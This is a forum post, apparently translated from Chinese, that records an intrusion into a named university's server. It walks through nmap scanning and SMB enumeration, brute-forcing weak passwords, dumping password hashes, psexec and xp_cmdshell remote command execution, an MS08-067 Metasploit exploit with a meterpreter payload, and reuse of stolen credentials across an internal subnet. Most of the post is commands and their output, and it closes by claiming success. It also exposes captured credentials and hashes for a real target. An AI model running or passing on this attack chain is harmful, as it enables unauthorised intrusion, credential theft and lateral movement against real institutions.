中国网络渗透测试联盟

Title: nmap+msf intrusion of Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46
Title: nmap+msf intrusion of Guangxi Normal University
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt

test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt

44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack ~~
6 v% [) _' M% t# e: X2 ?# N% c( P; H5 c, q3 T7 \# G





Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2